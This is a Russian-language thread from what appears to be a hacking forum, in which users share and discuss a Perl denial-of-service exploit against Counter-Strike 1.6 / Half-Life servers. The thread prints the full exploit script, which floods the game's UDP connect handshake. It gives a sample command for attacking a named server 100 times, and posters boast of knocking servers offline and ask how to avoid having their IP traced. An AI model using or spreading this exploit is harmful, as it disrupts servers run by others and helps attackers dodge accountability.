• XSS.stack #1 – первый литературный журнал от юзеров форума

Есть ли фитчи в Counter-Strike 1.6?

madde
Ну извини... Я уже забыл про нее (я просто когда ее проверял - эту тему, там дельных ответов не было), а вот ты мне ссылку дал, там уже действительно что-то дельное есть (я просто думал что тут всё осталось по старому)...
можно было сказать спасибо за ссылку;)
Спасибо)
можно было ы в той же теме спосить, ответил бы я:)
Ну ответь в любой теме пожалуйста...

все так, ток зачем папку с виндой засорять, приду утром напишу поподробнее... и еще... этим скриптом пользоваться не так просто как ты думаешь:)

спасибо!!! сделал все как тут сказанно!! просто шик!! угробил 3 сервака, только интересно сколько они так висеть будут? играть-то негде

ка кже ты их угробил:)

ДА! И линк на сам пёрл!

ссылку те дали, описание дали... но как не странно этот сплоит так пашет:) я просто удмал здесьприват выкладыывали, а это паблик:)

Ну вот как я всё делаю (показано на скрине)... За шумами айпи сервера (в момент теста сплойта, сервак работал)... Что я неправильно делаю? Скрин прикреплен!
:screenshot: Скриншот|Screenshot

Вы лучше скажите, админы сервака могут айпи мой попалить если я сервер задосил или нет? И еще... Напишите мне размер вашего сплойта в байтах (у которого расширение не txt, а pl)...

не, приват сплоит лучше пробивает чем этот:)
но он и денег стоит)... Я тут 2 сервака завалил, они до сих пор висят)))... Для халявы - этот сплойт рулит...

Пробуйте

Код:
#!/usr/bin/perl
# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux
# mod by system($cmd) :-))

use IO::Socket;
if (@ARGV < 4){
print "usage: ./csdos <host> <kol> <port> <pause>";
exit();
}

$host=$ARGV[0];
$l=$ARGV[1];
$p=$ARGV[2];
$pause=$ARGV[3];

for($i=1;$i<=$l;$i++){
econnect($host);
}
exit;

sub econnect($)
{
        my $host=$_[0];
        my $sock = new IO::Socket::INET(PeerAddr=>$host,PeerPort=> $p,Proto=>'udp');
        die "Could not create socket: $!\n" unless $sock;
        $cmd="\xff\xff\xff\xff";
        syswrite $sock, $cmd."getchallenge";

sysread $sock,$b,65535;  print $b,"\n";
        @c=split(/ /,$b);

$c2=$c[1];

$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep $pause;
close $sock;
}

ЗЫ
Доработано по просьбе madde :D

юзать его надо так

как и прежде надо вводитьлибо ip либо название сервера, далее количество запусков, есть серваки которые при заюзаниванию этого бага 1 раз не падают, а после 10 падают:), дальше указываете порт, раньше надо было постоянно редактировать фаил, дальше таймаут между попытками:) вобщем вот так

perl.exe cs16exploit.pl ploxoiservak.ru 100 27015 1

в данном случае сначало идет обращение к перлу, потом к скрипту, и задаются параментры, что будем ддосить ploxoiservak.ru 100 раз, а именно его порт №27015, и таймаут между попытками будет 1 сек
Добавлено в [time]1156779685[/time]
весит по-моему толи 30кб толи 300кб,...а насчет IP я себе установил SPOILER ip plat, и все ок

не поверишь но он ен помогает:) и ip спалить невозможно...

ток 2 случая может быть...

если amx успеет в лог занести
если баг залатан и стоит какая то система отлова ip

Киньте плз линк сразу на pl файл, а то когда я меняю расширение с txt на pl, у меня почему то сплойт не работает... Поэтому прошу кого-нить что бы сразу pl файлик залили))

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх